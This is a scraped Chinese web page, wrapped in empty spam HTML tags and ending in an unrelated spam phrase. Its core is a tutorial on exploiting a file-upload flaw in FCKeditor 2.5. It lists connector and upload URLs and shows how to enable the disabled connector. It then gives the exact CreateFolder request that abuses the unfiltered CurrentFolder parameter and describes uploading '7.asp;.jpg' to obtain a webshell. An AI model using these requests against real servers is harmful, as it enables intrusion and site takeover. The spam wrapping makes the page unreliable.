<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                ??碼云GVP開源項目 12k star Uniapp+ElementUI 功能強大 支持多語言、二開方便! 廣告
                ## FCKeditor編輯器: --- > ??可以去這下載編輯器:http://download.csdn.net/detail/u011781521/9767326 ### 該編輯器基礎 1. 查看編輯器版本 路徑:FCKeditor/\_whatsnew.html 2. FCKeditor編輯器頁 路徑:FCKeditor/\_samples/default.html 3. 常用上傳地址 ```url FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp ``` 由于這里用的是2.5的版本所以下面這條語句能用 > http://192.168.60.102:99/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp 如果在輸入以上地址測試的過程中彈出提示‘’‘this connector is disabled,please check the xxx file ’, 那就是沒有開啟文件上傳功能,需要開啟 ``` # 文件路徑 \editor\filemanager\connectors\asp\config.asp #參數 Dim ConfigIsEnabled ConfigIsEnabled = False ``` ### FCKeditor漏洞利用方法→文件上傳漏洞 先來到前文所指的后臺頁面 #### 漏洞利用 1. 新建文件夾captain.asp 被系統改為captain_asp,這就是fckeditor過濾"."為"\_"的一個機制, 2. 想要突破的話采用絕對路徑的方式創建文件夾,直接繞過函數。 執行以下地址就能成功創建文件夾 ``` /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo7777.asp&NewFolderName=xx.asp ``` 3. 然后我們再上傳`7.asp;.jpg`到`fendo7777.asp`文件下看是否成功解析 4. 上傳成功后,訪問該文件,默認文件路徑如下,已經成功獲取webshell `http://x.x.x.x/userfiles/image/fendo7777.asp;.jpg` #### 漏洞原因 為什么手動不能創建,而通過以上地址就能成功創建了,對比下手動創建和通過以上地址創建的一個區別。 ``` #漏洞地址: /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo7777.asp&NewFolderName=x.asp #手工新建: /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=captain.asp ``` **原因:** CurrentFolder:當前文件夾?未進行過濾(這個文件夾下的沒有過濾) NewFolderName:新建文件名?進行了過濾
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看